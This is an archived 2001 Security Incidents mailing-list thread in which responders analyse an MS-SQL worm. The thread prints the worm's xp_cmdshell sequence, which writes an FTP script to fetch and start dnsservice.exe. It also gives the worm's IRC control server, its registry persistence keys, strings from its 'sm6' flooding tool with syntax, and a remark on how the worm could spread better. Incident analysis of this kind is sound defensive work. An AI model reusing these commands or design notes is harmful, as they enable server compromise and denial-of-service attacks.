Security Incidents mailing list archives
Re: MS-SQL Worm?
From: Johannes Verelst <incidents () verelst net>
Date: Tue, 20 Nov 2001 20:11:20 +0100 (MET)
On Tue, 20 Nov 2001, Patrick Andry wrote:
Apparently the file is no longer available on the ftp server. Hopefully this worm is short-lived.
The strange thing about this 'worm' is that it is totally dependant on several central servers. Firstly, the FTP server where the files are retrieved, secondly the IRC server (that has been slashdottet now apparently). With Nimda, the tftp transfer was made from the infected to the infecting host. I am not trying to give advice on writing worms, but that is obviously a much better design. This worm will not spread massively since the servers it is depandant on are down within hours. Just my 2 eurocents, Johannes
Arthur Donkers wrote:Hi All, Analysed it a bit further (thanks to VMware and netmonitor) and once it is started it connects to an irc server at bots.kujikiri.net, port 6669. From the rest of the capture it seems it drops a message there with the name of the machine it compromised and a password like string. It furthermore (see strings output on executable, scan for registry keys) adds itself to the Run entry in the registry so it is started each time the machine is booted. A few of the registry keys: SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TaskReg SOFTWARE\Microsoft\MSSQLServer\Client\SuperSocketNetLib\ProtocolOrder SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo\DSQUERY From the strings output it seems to contain a scanner (sm6 ..) that will scan for new vulnerable machines. I'm not quite sure if and so, how, it is controlled from the IRC channel. I've tested it on our testing network so I'm not quite sure yet. I've attached the netmon capture file to this message. grtz, Arthur On Tue, 20 Nov 2001, Paul Nasrat wrote:On Tue, Nov 20, 2001 at 09:54:18AM -0500, Douglas P. Brown wrote:We saw a scan come in looking for systems answering on 1433, and immediately saw several systems start scanning out for other systems answering on 1433 - worm behavior? Has anyone else seen this?No, but the binaries it downloads: win32mon.exe and dnsservice.exe Are on the ftp site in the dump. I don't have a windows debugger to put them through but they look interesting: exec xp_cmdshell 'start dnsservice.exe' exec xp_cmdshell 'del ftp.x' exec xp_cmdshell 'ftp -s:ftp.x exec xp_cmdshell 'echo quit >> ftp.x' exec xp_cmdshell 'echo close >> ftp.x' exec xp_cmdshell 'echo get dnsservice.exe>> ftp.x' exec xp_cmdshell 'echo cd tmp>> ftp.x' exec xp_cmdshell 'echo cd pub>> ftp.x' exec xp_cmdshell 'echo bin>> ftp.x' exec xp_cmdshell 'echo foo.com>> ftp.x' exec xp_cmdshell 'echo ftp> ftp.x' GET /%s HTTP/1.0 Connection: Keep-Alive User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686) [GET] - Unable to connect to http. [GET] - Unable to resolve host. http:// [GET] - Unable to create new socket. GET <bot|wildcard> <host> <save as> %s %s %s %s NOTICE %s :Voyager Alpha Force: Age of Kaiten (now with blitz-fu) NICK %s NOTICE %s :Nick cannot be larger than 9 characters. NOTICE %s :NICK <nick> sm6 has finished... with tcp/syn boost! sm6 icmp/udp has begun... sm6 icmp/udp (w/pkt-push!) has begun.. Syntax: sm6 <wildcard|botname> <dest> <-n timelength> [-d delay] [-s src port] [-p dst port] [-rR random src/all ports] [-z random src ips] [-t include tcp/syn] [-z randomize src ips] [-S pkt size] -b <bcast file> etc. Paul Nasrat ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com------------------------------------------------------------------------ ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
-- "Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning." ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- MS-SQL Worm? Douglas P. Brown (Nov 20)
- Re: MS-SQL Worm? Paul Nasrat (Nov 20)
- Re: MS-SQL Worm? Arthur Donkers (Nov 20)
- Re: MS-SQL Worm? Patrick Andry (Nov 20)
- Re: MS-SQL Worm? Johannes Verelst (Nov 20)
- Re: MS-SQL Worm? Unknown (Nov 20)
- Re: MS-SQL Worm? Arthur Donkers (Nov 20)
- Re: MS-SQL Worm? Paul Nasrat (Nov 20)